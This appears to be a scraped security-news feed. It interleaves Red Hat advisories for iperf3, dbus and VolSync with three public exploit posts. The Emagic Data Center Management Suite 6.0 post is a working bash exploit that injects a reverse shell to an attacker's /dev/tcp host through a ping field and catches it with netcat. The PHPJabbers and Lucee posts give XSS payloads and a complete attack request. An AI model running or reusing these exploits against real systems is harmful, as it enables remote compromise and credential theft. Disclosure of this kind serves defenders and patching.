Red Hat Security Advisory 2023-4571-01 - Iperf is a tool which can measure maximum TCP bandwidth and tune various parameters and UDP characteristics. Iperf reports bandwidth, delay jitter, and data-gram loss.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: iperf3 security update  
Advisory ID:       RHSA-2023:4571-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4571  
Issue date:        2023-08-08  
CVE Names:         CVE-2023-38403   
=====================================================================

1. Summary:

An update for iperf3 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Iperf is a tool which can measure maximum TCP bandwidth and tune various  
parameters and UDP characteristics. Iperf reports bandwidth, delay jitter,  
and data-gram loss.

Security Fix(es):

* iperf3: memory allocation hazard and crash (CVE-2023-38403)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2222204 - CVE-2023-38403 iperf3: memory allocation hazard and crash

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
iperf3-3.9-10.el9_2.src.rpm

aarch64:  
iperf3-3.9-10.el9_2.aarch64.rpm  
iperf3-debuginfo-3.9-10.el9_2.aarch64.rpm  
iperf3-debugsource-3.9-10.el9_2.aarch64.rpm

ppc64le:  
iperf3-3.9-10.el9_2.ppc64le.rpm  
iperf3-debuginfo-3.9-10.el9_2.ppc64le.rpm  
iperf3-debugsource-3.9-10.el9_2.ppc64le.rpm

s390x:  
iperf3-3.9-10.el9_2.s390x.rpm  
iperf3-debuginfo-3.9-10.el9_2.s390x.rpm  
iperf3-debugsource-3.9-10.el9_2.s390x.rpm

x86_64:  
iperf3-3.9-10.el9_2.i686.rpm  
iperf3-3.9-10.el9_2.x86_64.rpm  
iperf3-debuginfo-3.9-10.el9_2.i686.rpm  
iperf3-debuginfo-3.9-10.el9_2.x86_64.rpm  
iperf3-debugsource-3.9-10.el9_2.i686.rpm  
iperf3-debugsource-3.9-10.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38403  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0qOVAAoJENzjgjWX9erEim4P/j6cppYdQK2YOr+UfsZow0nS  
xe2B2YZzu4wDh9Ps+oe+mtiBccjAZp328N6+x18BDO3iKctF1dgmHRDkwe95IaZk  
kmOtEaUX7VTgHteDae2xDTtJ8cttD2EqVPZgflq4pHqo5N8YtMeRvE/1+dT0Ms8d  
TJIcdEXK6EMLDQYs+E+EB5uQRcV0ySd3eKLJXGOidfMXkmV1bQ7AxIDaTOZU+5pe  
bxfZJqkkTrVJcoP0oadmIGNPBVb7t0FdZjZg3JtDb3xA4fB/Vx6cCdbZNrotl4SX  
XQF29x9GnYYLx5tDgd6iImRH49oPjSGxji1iUuALN74mdvtrn6tPenrjOvSwcosW  
a5EFOoyP3asoaXyUkcL6OTfFBgMJQE+L2thIsh7Vror24ZeUG0R44mLhyA/wQDyq  
oj8LDGJa645EwuuYTlruXDkRX41XolwWD2mfiB7X+fZM8VNoOhgaDiueLw/zBhEB  
sD+gV09yMLJbuMtcuQhWOjBd8Y4CCzFsdwmD7kPqvBgRoNeOsXuu4nNYYbYi45+W  
H0uvSxjaIKgI3GL4PGRgwkMIp6xS2NSDtJbnbx9V7F0CVw1WLAQ41mIN4TA2I3Sa  
+Nrgj1PMgXWu+w2aq5ykyRrrLwknGD8Hy9iSNQjllXO6MRaSEhFsVVo2BWsQYSEL  
B6Dem0aaLAGpNJ7qV1lS  
=gW6k  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4571-01

Emagic Data Center Management Suite version 6.0 suffers from a remote command execution vulnerability.

# Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection  
# Date: 03-08-2023  
# Exploit Author: Shubham Pandey & thewhiteh4t  
# Vendor Homepage: https://www.esds.co.in/enlight360  
# Version: 6.0.0  
# Tested on: Kali Linux  
# CVE : CVE-2023-37569

URL=$1  
LHOST=$2  
LPORT=$3

echo "*****************************"  
echo "*  ESDS eMagic 6.0.0 RCE    *"  
echo "*  > CVE-2023-37569         *"  
echo "*  > Shubham & thewhiteh4t  *"  
echo "*****************************"

if [ $# -lt 3 ]; then  
    echo """  
USAGE :

./exploit.sh http://<IP> <LHOST> <LPORT>  
./exploit.sh http://192.168.0.10 192.168.0.20 1337  
"""  
    exit 1  
fi

url="$1/index.php/monitor/operations/utilities/"

echo "[+] URL   : $URL"  
echo "[+] LHOST : $LHOST"  
echo "[+] LPORT : $LPORT"  
echo

payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"

post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846"

echo "[!] Triggering exploit..."

echo $url

(sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &

echo "[+] Catching shell..."  
nc -lvp 4444

Emagic Data Center Management Suite 6.0 Remote Command Execution

Red Hat Security Advisory 2023-4569-01 - D-Bus is a system for sending messages between applications. It is used both for the system-wide message bus service, and as a per-user-login-session messaging facility.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: dbus security update  
Advisory ID:       RHSA-2023:4569-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4569  
Issue date:        2023-08-08  
CVE Names:         CVE-2023-34969   
=====================================================================

1. Summary:

An update for dbus is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

D-Bus is a system for sending messages between applications. It is used  
both for the system-wide message bus service, and as a  
per-user-login-session messaging facility.

Security Fix(es):

* dbus: dbus-daemon: assertion failure when a monitor is active and a  
message from the driver cannot be delivered (CVE-2023-34969)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all running instances of dbus-daemon and all  
running applications using the libdbus library must be restarted, or the  
system rebooted.

5. Bugs fixed (https://bugzilla.redhat.com/):

2213166 - CVE-2023-34969 dbus: dbus-daemon: assertion failure when a monitor is active and a message from the driver cannot be delivered

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
dbus-daemon-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-devel-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-x11-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm

ppc64le:  
dbus-daemon-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-devel-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-x11-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm

s390x:  
dbus-daemon-1.12.20-7.el9_2.1.s390x.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.s390x.rpm  
dbus-devel-1.12.20-7.el9_2.1.s390x.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-x11-1.12.20-7.el9_2.1.s390x.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.s390x.rpm

x86_64:  
dbus-daemon-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.i686.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-devel-1.12.20-7.el9_2.1.i686.rpm  
dbus-devel-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-x11-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
dbus-1.12.20-7.el9_2.1.src.rpm

aarch64:  
dbus-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-libs-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-tools-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm

noarch:  
dbus-common-1.12.20-7.el9_2.1.noarch.rpm

ppc64le:  
dbus-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-libs-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-tools-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm

s390x:  
dbus-1.12.20-7.el9_2.1.s390x.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.s390x.rpm  
dbus-libs-1.12.20-7.el9_2.1.s390x.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-tools-1.12.20-7.el9_2.1.s390x.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.s390x.rpm

x86_64:  
dbus-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.i686.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-libs-1.12.20-7.el9_2.1.i686.rpm  
dbus-libs-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-tools-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-34969  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0qOIAAoJENzjgjWX9erEqicP/Aghm295i1cVKdG1tSNj7isd  
i9i2+4kzWpNH4jMEwJHGE9Zf5sbkuEo2v+M32CSKXo+ahIt/ZoXV7VNXiUWPAdWF  
80Y3kW3YKLXg1a0MqZurVmBz4bj+Pf9bHK+PoRqyr0R+PmDsNvURMyGwAdmkP5e5  
qCEZKC3wD0m6cEQR6+CFmw1umc7klvCrzDMDfkBTkT6LHd0L3kx/CdKAhmaD90Wp  
YyetYsNWX37iBXUYcjK0VNQqiwz3RMMpemZMXMo4v/C4CVVR6cABxnR2YpONy4KW  
uD2mx84M3gcvSuameqISkw7+QizY/lquA87zPXu/IwskraWzpfpDtQV0SdeSRbni  
DVsEC7i0OX/7f9uX3bYQXt6evCN5TUzpAFLnJmauPFBuq5+5l3PZXHGTecYJ9ANV  
JS2RYkCeTKAojeC/QAedKB6nDsg4NYlyK/9DCcbU5ERvAPOT0rsdxMTlcyXkI4TB  
ATz7zcKJWj1EJvaZZk00+jwwp07g7e0hvhyJqsJazfHaD9djOG0tNoYFG3gQNSCk  
/ifzbPaHepW6TOayqLOEFN+9A6XuJNDAgF6AOY77qCzSIlJa3wTDWaSUJiQsLhDu  
deDOjWl/Qjtm+AbNhmuKmnzeOPvnl78xwMazmx7P7GR29s7gfApt6Jebyfbo5YnI  
SlSOCtfoIWe4qbvVZcp8  
=8vma  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4569-01

Red Hat Security Advisory 2023-4575-01 - VolSync is a Kubernetes operator that enables asynchronous replication of persistent volumes within a cluster, or across clusters.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: VolSync 0.5.4 security fixes and enhancements  
Advisory ID:       RHSA-2023:4575-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4575  
Issue date:        2023-08-08  
CVE Names:         CVE-2020-24736 CVE-2022-36227 CVE-2023-0361   
                   CVE-2023-1667 CVE-2023-2283 CVE-2023-3089   
                   CVE-2023-26604 CVE-2023-27535 CVE-2023-38408   
=====================================================================

1. Summary:

VolSync v0.5.4 security fixes and enhancements

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

2. Description:

VolSync is a Kubernetes operator that enables asynchronous replication of  
persistent volumes within a cluster, or across clusters. After deploying  
the VolSync operator, it can create and maintain copies of your persistent  
data.

For more information about VolSync, see:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/add-ons/add-ons-overview#volsync

or the VolSync open source community website at:  
https://volsync.readthedocs.io/en/stable/.

This advisory contains enhancements and updates to the VolSync container  
images.

Security fix(es):  
* CVE-2023-3089 openshift: OCP & FIPS mode

3. Solution:

For details on how to install VolSync, refer to:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/add-ons/add-ons-overview#volsync-rep

4. Bugs fixed (https://bugzilla.redhat.com/):

2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

5. References:

https://access.redhat.com/security/cve/CVE-2020-24736  
https://access.redhat.com/security/cve/CVE-2022-36227  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-1667  
https://access.redhat.com/security/cve/CVE-2023-2283  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-26604  
https://access.redhat.com/security/cve/CVE-2023-27535  
https://access.redhat.com/security/cve/CVE-2023-38408  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0qN6AAoJENzjgjWX9erETT4P/jVK3VSrR8KdFizXGwnuczFA  
0gRx22ceAB0VrjvEUCSlM+Qlcn0WknT6cMWckoC0G9KzehbLcBbSsT5IOlm+MQ2R  
6qRBz6QMnY+d/7eMBnXY4h2EDXMKLD31Wj5DOjy4G6GbfaxPSgWUkNR1x+wKmcms  
uZTCZmsiRjwXJ0lG/Wx+Hf3N/Y8txhIAPi6PQ7C2kMqjEwWN87a0rRgg7JgccBGt  
Vibfd+a+AdcUcfMOUiPnHBFckTC6kLxCsaCY8mgsz0/B0RtU7XzeX7uHWxzYGQuc  
2C2Py9XhRpIEG9SsXLFTNc3nu3IjPWkLU0TCMgb7+K1MqKqhmuOyYBd9Bt+4/3tE  
2RkRdT3usUCr/jPSEJpxZs7ykb+7MNgMG54dDXQyPIBvw2AEL3p/0eHZ4wSIhsqK  
cUgsYCfzoXs5FS6xDfxKB8fohUxOTH1QLD5vx1Yob7yZ8wz+YeNH3pGIW5gLbWOd  
VopcJo3kl8zDABnD9nKDMpyiKM5yla3ql6oj4u89Stgi/2MObeqSF7VL06C68YLT  
SjEVcoPxR+LMFRx9PuiI4m7yGveQ0K0GUqvMv8H3z1CZn+K+BAIO4/Oi6jEGXsy2  
erTvAcG5NyEaUrh6UhEGGYNcIYMGDR9IJDf8TzSYkglhDNjLHeeJsNCpG8BjjD2u  
lmL1i5Wt+SLRbBa8q/MV  
=AN0W  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4575-01

PHPJabbers Vacation Rental Script version 4.0 suffers from a cross site request forgery vulnerability.

    # Exploit Title: PHPJabbers Vacation Rental Script 4.0 - CSRF# Date: 05/08/2023# Exploit Author: Hasan Ali YILDIR# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/vacation-rental-script/# Version: 4.0# Tested on: Windows 10 Pro## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsTechnical Detail / POC==========================1. Login Account2. Go to Property Page (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)3. Edit Any Property (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21)[1] Cross-Site Request ForgeryRequest:https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><font%20color="red">CSRF%20test</font>[2] Cross-Site Scripting (XSS)Request:https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><image/src/onerror=prompt(8)>

PHPJabbers Vacation Rental Script 4.0 Cross Site Request Forgery

Red Hat Security Advisory 2023-4576-01 - VolSync is a Kubernetes operator that enables asynchronous replication of persistent volumes within a cluster, or across clusters.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: VolSync 0.6.3 security fixes and enhancements  
Advisory ID:       RHSA-2023:4576-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4576  
Issue date:        2023-08-08  
CVE Names:         CVE-2020-24736 CVE-2022-35252 CVE-2022-36227   
                   CVE-2022-43552 CVE-2023-0361 CVE-2023-1667   
                   CVE-2023-2283 CVE-2023-3089 CVE-2023-24329   
                   CVE-2023-26604 CVE-2023-27535 CVE-2023-38408   
=====================================================================

1. Summary:

VolSync v0.6.3 security fixes and enhancements

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE links in the References section.

2. Description:

VolSync is a Kubernetes operator that enables asynchronous replication of  
persistent volumes within a cluster, or across clusters. After deploying  
the VolSync operator, it can create and maintain copies of your persistent  
data.

For more information about VolSync, see:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/add-ons/add-ons-overview#volsync

or the VolSync open source community website at:  
https://volsync.readthedocs.io/en/stable/.

This advisory contains enhancements and updates to the VolSync container  
images.

Security fix(es): * CVE-2023-3089 openshift: OCP & FIPS mode

3. Solution:

For details on how to install VolSync, refer to:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/add-ons/add-ons-overview#volsync-rep

4. Bugs fixed (https://bugzilla.redhat.com/):

2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

5. References:

https://access.redhat.com/security/cve/CVE-2020-24736  
https://access.redhat.com/security/cve/CVE-2022-35252  
https://access.redhat.com/security/cve/CVE-2022-36227  
https://access.redhat.com/security/cve/CVE-2022-43552  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-1667  
https://access.redhat.com/security/cve/CVE-2023-2283  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-26604  
https://access.redhat.com/security/cve/CVE-2023-27535  
https://access.redhat.com/security/cve/CVE-2023-38408  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0qNmAAoJENzjgjWX9erE0XEQAIGkOtzF36HLk9zsNN5ViO05  
pDEBBDxN3Q/V9eRKMxy+lNlUgk3jjc4SqxZlnJtCU13Vr+CUbZcikWLmwSTXh7gb  
ATEyBur+2i2GCPi/CQzZIe37rGO0xl6swaMFhTa8U0/q1rzQRSr73xfuxyEhL96j  
V1kMxK7WLvezcnkbo9eyw4V7vZVOqGXJEARTUGn5MyivnwoMDLiGLKJV/quXdPve  
zQFWuccegjdgNjzwGYxTe0aJnAXHOf19c4OD8KZ+GE+2QBlV1D68/D9+mljWSheO  
gP/IsqnuWGcZkngIU/nYhoBitGWgY13PRKNDiAGfF5ro1cgHeT/fGZ7tyWmYC/lq  
JM0jBTLh+LA1L+nFuBKArzfVaSviGXcz2+LR0aBIZfRvB4mqDP+mUnW3r1HF9Aa3  
3kHcgpdsHA5NT4FwCDKmiAw7C9QRdow2qiyOuInhMt+iGfC02j1ohAXgt4sW68gb  
P6QSR4/olTtJXmOuZwuRWXwDHxBxUrS4XEVwFqZ+TOM+a9Q9y3Wb8+09Kl9lv0RT  
z4oFmL3W5+9pC8AAqbYkyy66dWNjWYu4GHAGOpRA9K6B5maF4F8cijIuf4sTlmx2  
vhlJD8vGuyViI/Rwt9klaXTX2on4LBg/jBqWiwHdCwNpdPjBUWRNRNAsF4S+0BZN  
Kyoemtm32fm6VGubKbdW  
=8t4D  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4576-01

Lucee version 5.4.2.17 suffers from a cross site scripting vulnerability.

    # Exploit Title: Lucee 5.4.2.17 - Authenticated Reflected XSS# Google Dork: NA# Date: 05/08/2023# Exploit Author: Yehia Elghaly# Vendor Homepage: https://www.lucee.org/# Software Link: https://download.lucee.org/# Version: << 5.4.2.17# Tested on: Windows 10# CVE: N/ASummary: Lucee is a light-weight dynamic CFML scripting language with a solid foundation.Lucee is a high performance, open source, ColdFusion / CFML server engine, written in Java.Description: The attacker can able to convince a victim to visit a malicious URL, can perform a wide variety of actions, such as stealing the victim's session token or login credentials.The payload: ?msg=<img src=xss onerror=alert('xssya')>http://172.16.110.130:8888/lucee/admin/server.cfm?action=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3EPOST /lucee/admin/web.cfm?action=services.gateway&action2=create HTTP/1.1Host: 172.16.110.130:8888User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 278Origin: http://172.16.110.130:8888Connection: closeReferer: http://172.16.110.130:8888/lucee/admin/web.cfm?action=services.gateway&action2=createCookie: cfid=ee75e255-5873-461d-a631-0d6db6adb066; cftoken=0; LUCEE_ADMIN_LANG=en; LUCEE_ADMIN_LASTPAGE=overviewUpgrade-Insecure-Requests: 1name=AsynchronousEvents&class=&cfcPath=lucee.extension.gateway.AsynchronousEvents&id=a&_id=a&listenerCfcPath=lucee.extension.gateway.AsynchronousEventsListener&startupMode=automatic&custom_component=%3Fmsg%3D%3Cimg+src%3Dxss+onerror%3Dalert%28%27xssya%27%29%3E&mainAction=submit[Affected Component]Debugging-->TemplateService --> SearchServices  --> Event GatewayService --> Logging

Lucee 5.4.2.17 Cross Site Scripting

Red Hat Security Advisory 2023-4570-01 - Iperf is a tool which can measure maximum TCP bandwidth and tune various parameters and UDP characteristics. Iperf reports bandwidth, delay jitter, and data-gram loss.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: iperf3 security update  
Advisory ID:       RHSA-2023:4570-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4570  
Issue date:        2023-08-08  
CVE Names:         CVE-2023-38403   
=====================================================================

1. Summary:

An update for iperf3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Iperf is a tool which can measure maximum TCP bandwidth and tune various  
parameters and UDP characteristics. Iperf reports bandwidth, delay jitter,  
and data-gram loss.

Security Fix(es):

* iperf3: memory allocation hazard and crash (CVE-2023-38403)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2222204 - CVE-2023-38403 iperf3: memory allocation hazard and crash

